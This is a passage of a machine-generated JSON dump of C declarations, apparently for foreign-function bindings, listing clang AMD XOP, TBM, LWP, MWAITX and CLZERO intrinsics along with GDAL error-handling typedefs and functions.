"name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:461:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:467:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:473:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:479:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:491:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:497:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:503:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:509:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:515:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:521:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:527:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:533:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:539:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:545:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:551:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:557:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:563:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:569:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:575:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:581:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:587:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:593:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:599:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:605:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:611:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:617:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:623:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:629:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:635:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:641:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:647:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:653:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:659:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:665:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:671:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:677:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:683:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:689:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:695:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:701:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:707:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_frcz_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:732:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_frcz_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:738:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_frcz_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:744:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_frcz_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:750:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_frcz_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:756:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_frcz_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:762:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "__blcfill_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:25:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blci_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:31:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blcic_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:37:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blcmsk_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:43:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blcs_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:49:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blsfill_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:55:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blsic_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:61:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__t1mskc_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:67:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__tzmsk_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:73:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blcfill_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:84:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blci_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:90:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blcic_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:96:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blcmsk_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blcs_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blsfill_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blsic_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:120:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__t1mskc_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:126:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__tzmsk_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:132:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__llwpcb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/lwpintrin.h:32:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__addr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "__slwpcb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/lwpintrin.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "_mm_monitorx", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mwaitxintrin.h:20:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__extensions", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__hints", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mwaitx", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mwaitxintrin.h:26:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__extensions", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__hints", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__clock", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_clzero", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/clzerointrin.h:29:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__line", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "CSLConstList", "location": "/usr/include/gdal/cpl_port.h:1186:16", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "typedef", "ns": 0, "name": "ptrdiff_t", "location": "/usr/lib/clang/9.0.0/include/stddef.h:35:26", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "max_align_t", "location": "/usr/lib/clang/9.0.0/include/__stddef_max_align_t.h:24:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 50, "location": "/usr/lib/clang/9.0.0/include/__stddef_max_align_t.h:19:9", "bit-size": 256, "bit-alignment": 128, "fields": [{ "tag": "field", "name": "__clang_max_align_nonce1", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "__clang_max_align_nonce2", "bit-offset": 128, "bit-size": 128, "bit-alignment": 128, "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }] } }, { "tag": "enum", "ns": 0, "name": "", "id": 51, "location": "/usr/include/gdal/cpl_error.h:52:9", "fields": [{ "tag": "field", "name": "CE_None", "value": 0 }, { "tag": "field", "name": "CE_Debug", "value": 1 }, { "tag": "field", "name": "CE_Warning", "value": 2 }, { "tag": "field", "name": "CE_Failure", "value": 3 }, { "tag": "field", "name": "CE_Fatal", "value": 4 }] }, { "tag": "typedef", "ns": 0, "name": "CPLErr", "location": "/usr/include/gdal/cpl_error.h:59:3", "type": { "tag": ":enum", "name": "", "id": 51 } }, { "tag": "typedef", "ns": 0, "name": "CPLErrorNum", "location": "/usr/include/gdal/cpl_error.h:94:13", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "CPLError", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:141:14", "variadic": true, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eErrClass", "type": { "tag": "CPLErr" } }, { "tag": "parameter", "name": "err_no", "type": { "tag": "CPLErrorNum" } }, { "tag": "parameter", "name": "fmt", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLErrorV", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:142:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErr" } }, { "tag": "parameter", "name": "", "type": { "tag": "CPLErrorNum" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "va_list" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLEmergencyError", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:143:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLErrorReset", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:144:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLGetLastErrorNo", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:145:33", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "CPLErrorNum" } }, { "tag": "function", "name": "CPLGetLastErrorType", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:146:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "CPLGetLastErrorMsg", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:147:34", "variadic": 